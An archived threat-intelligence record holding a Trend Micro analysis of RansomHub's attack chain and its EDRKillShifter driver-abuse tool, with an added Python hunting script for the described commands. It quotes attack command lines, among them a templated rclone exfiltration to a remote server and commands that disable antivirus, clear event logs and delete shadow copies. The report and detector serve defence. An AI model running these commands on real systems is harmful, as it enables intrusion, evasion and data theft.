{
	"id": "12b427b1-7d93-43e6-bdd3-bcd9e68c07fc",
	"created_at": "2026-04-06T00:21:33.714751Z",
	"updated_at": "2026-04-10T13:12:10.29504Z",
	"deleted_at": null,
	"sha1_hash": "f2a01ee1d220f3af6c240fad7832a48e7d42e789",
	"title": "How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2074790,
	"plain_text": "How RansomHub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections\r\nPublished: 2024-09-20 · Archived: 2026-04-05 15:01:29 UTC\r\nHighlights:\r\nThe group behind the RansomHub ransomware, which Trend Micro tracks as Water Bakunawa, employs various anti-EDR techniques to play a high-stakes game of hide and seek with security solutions.\r\nThe RansomHub ransomware’s attack chain includes exploiting the Zerologon vulnerability (CVE-2020-1472). Left unpatched, it can enable threat actors to take control of an entire network without needing authentication.\r\nRansomHub has been attributed to ransomware attacks on the following industries and critical infrastructure sectors: water and wastewater, IT, commercial and government services and facilities, healthcare, agriculture, financial services, manufacturing, transportation, and communications.\r\nTrend Micro analysts and experts found corroborating evidence of multiple spear-phishing attempts, indicating that the ransomware attacks are targeted. The group has been known to threaten the organizations it has successfully compromised, demanding ransom payments in exchange for not releasing the stolen files to the public.\r\nRansomHub is notable for its affiliate model and for using techniques to disable or terminate endpoint detection and response (EDR) tools to evade detection and prolong its presence within compromised systems or networks. Following our threat hunting team’s recent discovery of a new RansomHub evasion technique, the integration of EDRKillShifter into its attack chain, we investigated a recent incident using Trend Micro’s Vision One telemetry data.\r\nEDRKillShifter is designed to exploit vulnerable drivers, undermining the effectiveness of EDR solutions by employing techniques to evade detection and disrupt security monitoring processes. In addition, EDRKillShifter supports persistence through techniques that keep it present on the system even after the initial compromise is discovered and cleaned. It disrupts security processes in real time and adapts its methods as detection capabilities evolve, staying a step ahead of traditional EDR tools. Integrated into the entire attack chain, EDRKillShifter ensures that all phases of an attack benefit from its EDR-disabling functionality, increasing overall effectiveness. These capabilities make EDRKillShifter a formidable tool against conventional endpoint security solutions and call for organizations to adopt more robust and adaptive security measures.\r\nOver the past months, the cybercriminals behind the RansomHub ransomware have gained significant notoriety. The FBI’s advisory in August reported that the group has successfully targeted 210 organizations across a range of industries and critical infrastructure sectors, including IT, government services, healthcare, agriculture, financial services, transportation, and communications.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 1 of 19\r\nIn this article, we take a closer look at how RansomHub uses EDRKillShifter in its attack chain and how it disrupts traditional defense mechanisms. Insights into these techniques can help cybersecurity professionals anticipate RansomHub’s strategies and other threats that might employ similar TTPs.\r\nThe advanced features of Trend Micro's Vision One have been instrumental in uncovering these tactics. Vision One's comprehensive telemetry and analytical capabilities allowed us to dissect the methods employed by RansomHub and to map out its tactics, techniques, and procedures (TTPs) as well as its operational methods and its impact on cybersecurity defenses.\r\nRansomHub’s infection chain\r\nFigure 1 illustrates the infection chain of the RansomHub ransomware, detailing the stages from initial access to data exfiltration and ransom demand.\r\nInitial access: RansomHub typically achieves initial access by targeting internet-facing systems and user endpoints through methods such as phishing emails, exploitation of known vulnerabilities, and password-spraying attacks. In the incident we analyzed, a single compromised user account was responsible for most of the malicious activity, indicating that it was the principal entry point for the attack. This is corroborated by evidence of multiple spear-phishing attempts that we identified during our analysis. With telemetry data from Vision One, we also identified another potential access vector, the Zerologon vulnerability (CVE-2020-1472), which has also been observed in an unrelated incident.\r\nFigure 2. Multiple detections indicating a possible spear phishing attack\r\nFigure 3. Detections via Vision One indicating abuse of an elevation control mechanism\r\nEvasion: In this incident, RansomHub employed four batch script files as a means of evasion, named “232.bat”, “tdsskiller.bat”, “killdeff.bat”, and “LogDel.bat”:\r\n232.bat performs a brute-force technique known as password spraying and disables Windows Defender’s real-time monitoring feature.\r\nFigure 4. 232.bat performing brute force\r\nFigure 5. 232.bat disabling Windows Defender’s real-time monitoring feature\r\nThe tdsskiller.bat batch script modifies the Windows Registry to set the default shell program to explorer.exe for users logging into the system. It also forcibly terminates a set of processes selected by image name, using a combination of taskkill filters and wildcards.\r\nFigure 6. Modification of HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\r\nFigure 7. Utilization of the taskkill utility to terminate running processes in Windows\r\nIt also uses “C:\\Windows\\tdsskiller.exe” to disable an antivirus service with the command “-dcsvc \"TMBMServer\" -accepteula”. The parameter -dcsvc \"TMBMServer\" instructs the TDSSKiller utility to disable the TMBMServer service, which is the Trend Micro Unauthorized Change Prevention Service. The addition of -accepteula accepts the end-user license agreement (EULA) automatically, allowing the command to run without further prompts. This action deactivates the designated antivirus service and compromises the system’s security.\r\nFigure 8. Vision One detection of tdsskiller disabling an antivirus service\r\nMeanwhile, killdeff.bat carries an obfuscated PowerShell command designed to toggle Windows Defender settings for malicious purposes. It includes several stages of execution that manipulate registry entries, alter Windows Defender and notification settings, and attempt privilege escalation. The script employs obfuscated inline expressions, environment-variable reads, and conditional logic to enable or disable Windows Defender’s features and suppress notifications. It also includes user-interaction prompts to decide whether to enable or disable Windows Defender, and it abuses low-level interactions with system processes to elevate privileges and bypass UAC.\r\nFigure 9. killdeff.bat’s obfuscated PowerShell command\r\nWe observed LogDel.bat making suspicious changes to system files and settings. The script altered the attributes of the Default.rdp file by executing the command “attrib Default.rdp -s -h”, removing the system and hidden attributes so the file is easier to tamper with. LogDel.bat was also found to have the capability to modify the Windows registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers, potentially altering Remote Desktop Protocol (RDP) settings to facilitate unauthorized remote access.\r\nFigure 10. The command used to remove the system and hidden attributes of Default.rdp via Attrib.exe\r\nOf further concern is the script’s capability to clear Windows Event Logs using wevtutil, thereby erasing traces of malicious activity and hindering forensic investigation.\r\nFigure 11. LogDel.bat executing wevtutil.exe with the command “wevtutil.exe cl \"Application\"”\r\nEDRKillShifter: In this part, we dive into our threat hunting team’s analysis of EDRKillShifter. The EDRKillShifter tool functions as a “loader” executable, serving as a delivery mechanism for a legitimate driver that is susceptible to abuse to terminate applications related to antivirus solutions. This type of tool is often referred to as a “bring your own vulnerable driver” (BYOVD) tool. The execution process of this loader involves three primary steps. First, the attacker must run EDRKillShifter using a command line that includes a password string.\r\nFigure 12. Execution of EDRKillShifter with the “-pass” argument\r\nWhen executed with the correct password, the executable decrypts an embedded resource named “data.bin” and executes it in memory. The data.bin code unpacks and executes the final payload. This payload then deploys and exploits the vulnerable legitimate driver to acquire sufficient privileges to disable an EDR tool’s protection.\r\nFigure 13. data.bin file created\r\nOnce the contents of data.bin have been decrypted, execution proceeds into that code. The second-stage payload then decrypts the final payload, which contains the Go binary and the vulnerable driver.\r\nFigure 14. EDRKillShifter dropping the vulnerable driver\r\nThe list of applications that EDRKillShifter can terminate can be found in the IoC text file linked at the end of the article.\r\nFigure 15. EDRKillShifter (svc.exe) creates a Windows service named KB20240815\r\nCredential access: RansomHub escalates its attack by employing Task Manager to dump credentials from the memory of the Local Security Authority Subsystem Service (LSASS). This technique allows the attackers to extract sensitive credentials, opening the door to deeper and more damaging breaches. With these credentials, RansomHub can amplify its highly intrusive attacks and complicate recovery efforts.\r\nFigure 16. Taskmgr.exe creating a file named lsass.DMP\r\nDiscovery: RansomHub ramps up its attack by deploying the NetScan tool for covert network reconnaissance. Using the Lateral Tool Transfer technique (T1570), the attackers copy NetScan onto the victim’s system via the RDP clipboard buffer. This tactic allows RansomHub to map out the victim’s network, laying the groundwork for targeted attacks and even more severe breaches.\r\nFigure 17. Execution of Netscan.exe\r\nLateral movement: By employing the Lateral Tool Transfer technique, the attackers moved malicious tools between systems. They then used SMB/Windows Admin Shares to connect remotely and execute commands. Central to their strategy was the use of the NetScan tool to pinpoint and map network endpoints, allowing for precise and efficient lateral movement throughout the network.\r\nFigure 18. RansomHub utilizing NetScan for discovery and employing the Lateral Tool Transfer technique\r\nCommand and control: RansomHub used the remote access tool AnyDesk as its command-and-control (C\u0026C) infrastructure. AnyDesk, typically used for legitimate remote support and connectivity, was repurposed by the attackers to maintain control over compromised systems. Through AnyDesk, they executed commands, exfiltrated sensitive data, and orchestrated lateral movement across the network.\r\nFigure 19. RansomHub installing AnyDesk.exe\r\nExfiltration: The threat actors employ the command-line tool “rclone” to steal sensitive files from the compromised network. This tactic aligns with the MITRE ATT\u0026CK technique T1041, Exfiltration Over C2 Channel, where data is transferred out of the network to a remote location under the attackers’ control.\r\nLet’s take this command as an illustration:\r\nrclone copy \\\\\u003cCOMPROMISED_IP\u003e\\i$ \u003cREMOTE_SERVER\u003e:\u003cREMOTE_PATH\u003e\\Users --include \".pdf\" --include \".docx\" --include \".sql\" --max-age \u003cDATE\u003e\r\n\u003cCOMPROMISED_IP\u003e represents the IP address of the targeted system, \u003cREMOTE_SERVER\u003e:\u003cREMOTE_PATH\u003e refers to the location where the exfiltrated data is sent, and \u003cDATE\u003e specifies a cutoff for file modification time (--max-age transfers only files modified more recently than the given age or date). The command reads the hidden administrative share i$ of the targeted host over SMB, selectively targets valuable file types, such as documents and databases, and transfers them to a remote server. The attackers use these exfiltrated files as leverage, threatening to release them publicly if the ransom is not paid.\r\nImpact: After executing RansomHub’s TTPs, the ransomware binary is subsequently deployed. As with EDRKillShifter, the ransomware binary executes only when a predefined password key is supplied with the “-pass” parameter.\r\nFigure 20. RansomHub binary with the -pass argument\r\nUpon successful execution, RansomHub proceeds to encrypt files, appending an extension that depends on the file name of the ransom note. In this incident, the ransom note has the file name “README_1d7fdb.txt”.\r\nFigure 21. Ransom note example\r\nAs Figure 21 shows, the encrypted file has the extension “.1d7fdb”, which, as mentioned, depends on the ransom note’s file name. This indicates the successful encryption of the file.\r\nFigure 22. File encrypted by RansomHub\r\nAdditionally, the RansomHub binary can delete all existing Volume Shadow Copy Service (VSS) snapshots on a Windows system via vssadmin.exe without prompting for confirmation.\r\nFigure 23. Deletion of Shadow Copies via vssadmin.exe\r\nRansomHub’s attack chain highlights a growing trend in ransomware operations, where attackers increasingly rely on tools like EDRKillShifter to bypass security defenses. This underscores the need for a multilayered defense strategy that combines forward-looking technology with proactive threat intelligence. As ransomware groups adopt similar anti-EDR tactics, enhancing resilience and adapting security strategies will be crucial to safeguarding digital assets.\r\nSecurity recommendations for RansomHub\r\nTo defend against the evolving threat of RansomHub, organizations should adopt a comprehensive security strategy:\r\nStrengthen endpoint protection systems. Ensure that your EDR solutions are equipped with the latest threat intelligence to detect new and evolving ransomware techniques. Behavioral analysis and heuristic scanning help detect unusual activity or anomalous behaviors that may signal attempts to execute ransomware. Restrict access to endpoints based on continuous verification to limit lateral movement. Endpoint isolation and rollback capabilities can also help mitigate attacks.\r\nTrend Micro’s Apex One, for example, provides multilayered protection with advanced threat detection and response capabilities, using behavioral analysis and machine learning to detect and mitigate threats. Trend Micro’s XDR provides comprehensive threat visibility and expert analytics across email, endpoints, servers, cloud workloads, and networks.\r\nImplement driver- and kernel-level protections. These security mechanisms help prevent unauthorized access to and manipulation of system drivers, a tactic employed by RansomHub. There are also tools and technologies that can safeguard against the execution of malicious or unsigned drivers. Ensure that only trusted code runs within the kernel, regularly monitor kernel-level activity for suspicious behavior, and verify that the security tools themselves are protected from tampering.\r\nTrend Micro’s Deep Security has an integrity-monitoring feature that ensures that only signed and verified drivers are allowed, preventing unauthorized or malicious drivers from being loaded. Deep Security also has a virtual patching capability that provides immediate protection against newly discovered vulnerabilities in drivers before official patches are applied.\r\nEnforce credential and authentication security. Enable multifactor authentication (MFA) across all access points, regularly update passwords, and monitor for any signs of credential misuse. Limit access based on roles to reduce exposure, and ensure that authentication systems are regularly audited for vulnerabilities to prevent unauthorized access.\r\nTrend Micro Password Manager, for instance, enforces the use of strong, complex passwords and regular password rotation across all systems to reduce the risk of unauthorized access to systems requiring elevated privileges.\r\nEnable behavioral monitoring and anomaly detection. These security mechanisms continuously analyze patterns of normal behavior to flag deviations that could indicate ransomware or other malicious activity. Detecting anomalies early, such as unauthorized file encryption or lateral movement within the network, allows for a swift response before major damage occurs. Combining real-time monitoring with automated alerts and analysis significantly enhances your ability to detect threats like RansomHub in their early stages.\r\nApex One, for example, has behavior monitoring capabilities to detect and block malicious activities such as unauthorized file modifications or memory allocation anomalies. Trend Micro’s Managed XDR service augments threat and anomaly detection with expert analysis and 24/7 monitoring across email, endpoints, servers, cloud workloads, and networks.\r\nHarden the endpoints’ security configurations. Apply strict access controls, disable unnecessary services, and ensure that all systems are regularly patched and updated. Standardize security settings across devices and regularly audit endpoint configurations to identify and address weaknesses or vulnerabilities before they can be exploited.\r\nDeep Security has an application control feature that allows only verified and authorized applications while blocking unauthorized executables. Trend Micro Apex Central enforces the principle of least privilege by ensuring that applications and users have only the permissions necessary for their respective functions.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nRansomHub Attacks Surge: New Anti-EDR Tactics Unveiled and AMADEY Infrastructure Connection\r\nTrend Micro Vision One Threat Insights App\r\nThreat Actor/s: Water Bakunawa\r\nEmerging Threats: RansomHub Ramps Up: New Anti-EDR Tactics Unveiled and AMADEY Infrastructure Connection\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTrend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post against data in their environment.\r\nEDRKILLSHIFT Detection\r\nmalName:(\"*EDRKILLSHIFT*\") AND eventName:MALWARE_DETECTION\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nIndicators of Compromise (IoCs):\r\nThe full list of IoCs can be found here.
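Hunting logic for the tradecraft described in this article (the batch scripts, the EDRKillShifter service, the LSASS dump, NetScan, rclone and vssadmin), as an added Python example that is not part of the original article and not Trend Micro’s code. It runs over constructed Sysmon-style process-creation (event 1) and file-creation (event 11) records and System-log service-install (7045) records embedded in the listing. The tool names, switches, lsass.DMP, Default.rdp and KB20240815 are taken from the text above; the field names (Image, CommandLine, TargetFilename, ServiceName, ImagePath), the host 10.0.0.5, the edr* image filter and the remote name are assumptions made for the sample, and the rule that flags any .sys service outside the System32 drivers directory is a generalization of the KB20240815 observation, not something the article states. Technique IDs follow the article’s ATT&CK table, including T1567.002 for rclone.

```python
import re
from dataclasses import dataclass

SEP = chr(92)  # backslash, the Windows path separator

def win(path):
    # forward-slash path -> the backslash form found in real Sysmon records
    return path.replace('/', SEP)

def q(token):
    # wrap a token in double quotes (chr(34)) the way cmd.exe command lines do
    return chr(34) + token + chr(34)

@dataclass(frozen=True)
class Finding:
    technique: str  # MITRE ATT&CK ID, taken from the article's technique table
    rule: str
    detail: str

def split_command_line(command_line):
    # lower-case, normalise separators, strip path and .exe from the executable name
    tokens = command_line.lower().replace(SEP, '/').split()
    exe = tokens[0].rsplit('/', 1)[-1].removesuffix('.exe') if tokens else ''
    return exe, tokens

def is_admin_share(token):
    # UNC admin share (host, then a drive letter plus $): the source in the quoted rclone command
    return re.fullmatch(r'//[^/]+/[a-z][$]', token) is not None

# (rule name, ATT&CK ID, predicate over (exe, tokens, lower-cased command line))
PROCESS_RULES = [
    ('tdsskiller_disables_av_service', 'T1562.001',            # tdsskiller.bat
     lambda exe, t, c: exe == 'tdsskiller' and '-dcsvc' in t),
    ('taskkill_wildcard_image_filter', 'T1562.001',            # tdsskiller.bat
     lambda exe, t, c: exe == 'taskkill' and '/fi' in t and 'imagename' in c and '*' in c),
    ('wevtutil_clears_event_log', 'T1070.001',                 # LogDel.bat
     lambda exe, t, c: exe == 'wevtutil' and t[1:2] == ['cl']),
    ('attrib_unhides_default_rdp', 'T1222.001',                # LogDel.bat
     lambda exe, t, c: exe == 'attrib' and {'default.rdp', '-s', '-h'} <= set(t)),
    ('vssadmin_deletes_shadow_copies', 'T1490',                # ransomware binary
     lambda exe, t, c: exe == 'vssadmin' and {'delete', 'shadows'} <= set(t)),
    ('rclone_copies_admin_share', 'T1567.002',                 # exfiltration
     lambda exe, t, c: exe == 'rclone' and len(t) > 2 and t[1] == 'copy' and is_admin_share(t[2])),
    ('netscan_network_discovery', 'T1046',                     # discovery
     lambda exe, t, c: exe == 'netscan'),
    ('pass_gated_loader_or_ransomware', 'T1562.001',           # -pass switch, Figures 12 and 20
     lambda exe, t, c: '-pass' in t),
]

def check_process(rec):
    cmd = rec.get('CommandLine', '')
    exe, tokens = split_command_line(cmd)
    return [Finding(tid, name, cmd) for name, tid, hit in PROCESS_RULES if hit(exe, tokens, cmd.lower())]

def check_file_create(rec):
    # Figure 16: Task Manager writing lsass.DMP is a GUI dump of LSASS memory
    image = rec.get('Image', '').lower().replace(SEP, '/')
    target = rec.get('TargetFilename', '').lower().replace(SEP, '/')
    if image.endswith('/taskmgr.exe') and target.endswith('/lsass.dmp'):
        return [Finding('T1003.001', 'taskmgr_dumps_lsass', rec['TargetFilename'])]
    return []

def check_service_install(rec):
    # Figure 15: the dropped driver was registered as a service named KB20240815. The wider
    # check is an assumption, not from the article: flag any KB-style service name and any
    # kernel driver (.sys) whose image lives outside the System32 drivers directory.
    name = rec.get('ServiceName', '')
    path = rec.get('ImagePath', '').lower().replace(SEP, '/')
    if re.fullmatch(r'kb[0-9]{8}', name, re.IGNORECASE) or (
            path.endswith('.sys') and '/system32/drivers/' not in path):
        return [Finding('T1569.002', 'suspicious_driver_service', name + ' -> ' + rec.get('ImagePath', ''))]
    return []

HANDLERS = {1: check_process, 11: check_file_create, 7045: check_service_install}

def hunt(records):
    # dispatch on event ID (Sysmon 1 and 11, System 7045); other IDs are ignored
    return [f for rec in records for f in HANDLERS.get(rec.get('EventID'), lambda r: [])(rec)]

# Constructed records; only the tool names, switches and file names come from the article.
SAMPLE_RECORDS = [
    {'EventID': 1, 'Image': win('C:/Windows/tdsskiller.exe'),
     'CommandLine': win('C:/Windows/tdsskiller.exe') + ' -dcsvc ' + q('TMBMServer') + ' -accepteula'},
    {'EventID': 1, 'Image': win('C:/Windows/System32/taskkill.exe'),
     'CommandLine': 'taskkill /F /FI ' + q('IMAGENAME eq edr*')},
    {'EventID': 1, 'Image': win('C:/Windows/System32/wevtutil.exe'),
     'CommandLine': 'wevtutil.exe cl ' + q('Application')},
    {'EventID': 1, 'Image': win('C:/Windows/System32/attrib.exe'), 'CommandLine': 'attrib Default.rdp -s -h'},
    {'EventID': 1, 'Image': win('C:/Windows/System32/vssadmin.exe'),
     'CommandLine': 'vssadmin.exe delete shadows /all /quiet'},
    {'EventID': 1, 'Image': win('C:/Users/Public/rclone.exe'),
     'CommandLine': 'rclone copy ' + win('//10.0.0.5/i$') + ' remote:loot/Users --include ' + q('.pdf')},
    {'EventID': 1, 'Image': win('C:/Users/Public/Netscan.exe'), 'CommandLine': 'Netscan.exe'},
    {'EventID': 1, 'Image': win('C:/Users/Public/svc.exe'), 'CommandLine': 'svc.exe -pass <REDACTED>'},
    {'EventID': 11, 'Image': win('C:/Windows/System32/Taskmgr.exe'),
     'TargetFilename': win('C:/Users/admin/AppData/Local/Temp/lsass.DMP')},
    {'EventID': 7045, 'ServiceName': 'KB20240815', 'ImagePath': win('C:/Users/Public/svc.sys')},
    {'EventID': 1, 'Image': win('C:/Windows/System32/notepad.exe'), 'CommandLine': 'notepad.exe notes.txt'},
]

if __name__ == '__main__':
    for finding in hunt(SAMPLE_RECORDS):
        print(finding.technique, finding.rule, finding.detail)
```

Run the file to list the ten findings from the sample (the notepad record produces none); each PROCESS_RULES entry is one command-line pattern, so new tradecraft is a one-tuple addition. The service-install rule is deliberately the loosest: legitimate third-party drivers also install from outside the System32 drivers directory, so treat that finding as a triage lead and confirm it against the driver’s signer and Microsoft’s vulnerable-driver blocklist before acting.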
\r\nMITRE ATT\u0026CK® techniques\r\nTactic | Technique | ID\r\nInitial Access | Valid Accounts: Domain Accounts | T1078.002\r\nInitial Access | Exploitation of Remote Services | T1210\r\nExecution | Service Execution | T1569.002\r\nPrivilege Escalation | Abuse Elevation Control Mechanism: Bypass User Account Control | T1548.002\r\nDefense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001\r\nDefense Evasion | File and Directory Permissions Modification: Windows File and Directory Permissions Modification | T1222.001\r\nDefense Evasion | Indicator Removal: Clear Windows Event Logs | T1070.001\r\nDefense Evasion | Impair Defenses: Safe Mode Boot | T1562.009\r\nCredential Access | Brute Force | T1110\r\nCredential Access | OS Credential Dumping | T1003\r\nCredential Access | OS Credential Dumping: LSASS Memory | T1003.001\r\nExfiltration | Exfiltration to Cloud Storage | T1567.002\r\nDiscovery | Network Service Discovery | T1046\r\nLateral Movement | Remote Services: SMB/Windows Admin Shares | T1021.002\r\nImpact | Data Encrypted for Impact | T1486\r\nImpact | Inhibit System Recovery | T1490\r\nSource: https://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html"
	],
	"report_names": [
		"how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html"
	],
	"threat_actors": [
		{
			"id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312",
			"created_at": "2024-06-07T02:00:03.998431Z",
			"updated_at": "2026-04-10T02:00:03.64336Z",
			"deleted_at": null,
			"main_name": "RansomHub",
			"aliases": [],
			"source_name": "MISPGALAXY:RansomHub",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "946af10b-32da-4f40-90fd-907ac77b0ea1",
			"created_at": "2025-08-07T02:03:24.905578Z",
			"updated_at": "2026-04-10T02:00:03.835556Z",
			"deleted_at": null,
			"main_name": "GOLD HUBBARD",
			"aliases": [
				"Water Bakunawa"
			],
			"source_name": "Secureworks:GOLD HUBBARD",
			"tools": [
				"RansomHub"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7de82e85-4e62-4756-8584-e11f13618dc8",
			"created_at": "2026-01-23T02:00:03.292885Z",
			"updated_at": "2026-04-10T02:00:03.932027Z",
			"deleted_at": null,
			"main_name": "Water Bakunawa",
			"aliases": [],
			"source_name": "MISPGALAXY:Water Bakunawa",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434893,
	"ts_updated_at": 1775826730,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f2a01ee1d220f3af6c240fad7832a48e7d42e789.pdf",
		"text": "https://archive.orkl.eu/f2a01ee1d220f3af6c240fad7832a48e7d42e789.txt",
		"img": "https://archive.orkl.eu/f2a01ee1d220f3af6c240fad7832a48e7d42e789.jpg"
	}
}